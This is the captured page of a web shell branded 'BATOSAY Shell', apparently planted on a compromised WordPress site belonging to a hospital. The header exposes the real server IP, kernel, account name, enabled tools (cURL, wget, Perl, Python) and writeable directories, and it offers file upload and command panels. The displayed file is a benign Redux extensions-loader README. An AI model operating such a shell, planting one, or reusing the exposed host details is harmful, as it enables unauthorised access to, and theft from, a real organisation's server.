BATOSAY Shell
Server IP : 170.10.162.208  /  Your IP : 216.73.216.38
Web Server : LiteSpeed
System : Linux altar19.supremepanel19.com 4.18.0-553.69.1.lve.el8.x86_64 #1 SMP Wed Aug 13 19:53:59 UTC 2025 x86_64
User : deltahospital ( 1806)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/home/deltahospital/www/wp-content/themes/imedica/admin/redux-extensions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /proc/self/root/home/deltahospital/www/wp-content/themes/imedica/admin/redux-extensions/README.md
redux-extensions-loader
================

The loader code needed to instantiate any Redux extension. To load any Redux extension, you need but do two things:

* Inside loader.php change `{$redux_opt_name}` to match your opt_name or set `$redux_opt_name` to your `opt_name` and make sure it's accessible by loader.php.
* Change the function name and hook reference of `redux_register_custom_extension_loader` as not to conflict with another developer's code.

Then place any extension folder within ~/extensions.

Depending on the extension you may also need to load a config file of some type to declare the options for that extension.

# Make sure this is included before you declare your Redux Framework object.
Because of WordPress hooks you need to include this before you create your ReduxFramework instance. It has to do with hooks. Just load this loader and your config settings prior to creating that object.

## Note: DO NOT place extensions within ~/ReduxCore/Extensions
If you do so any other plugin could override your extensions and they would be inaccessible by your code.

Batosay - 2023
IDNSEO Team